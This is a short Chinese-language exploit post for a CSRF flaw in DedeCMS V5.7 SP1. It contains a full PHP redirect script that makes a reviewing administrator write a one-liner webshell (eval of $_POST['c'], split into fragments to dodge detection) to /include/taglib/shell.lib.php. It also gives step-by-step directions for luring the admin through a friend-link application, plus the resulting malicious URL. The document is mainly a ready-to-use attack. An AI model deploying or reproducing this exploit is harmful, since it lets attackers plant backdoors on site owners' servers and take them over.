先上exp:
<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路徑
//拼接 exp
$muma = '<'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'c'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>
從exp大概可以看出,這里利用管理員的權限寫了一個shell.lib.php的一句話文件
從exp就可以判斷出,這里應該就是一個CSRF漏洞。下面說一下利用方法。
首先,將這個exp部署在你的服務器上,當然你必須要有一個公網ip,假設你的url為:
-
http://www.xxxx.com/exp.php`
在目標網站的申請友情鏈接處申請一個友情鏈接,
提交
提交之后等待管理員審核,當管理員審核的時候,一般情況下會點進你的網站看一看
審核的地方在 后台—》模塊—》輔助插件—》友情鏈接
當點這個友情鏈接的時候,就生成了一句話shell,shell地址在
/include/taglib/shell.lib.php
管理員觸發了一個鏈接:
-
http://127.0.0.1/DedeCMS-V5.7-UTF8-SP1-Full/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php
這個鏈接是利用管理員的權限生成了一句話。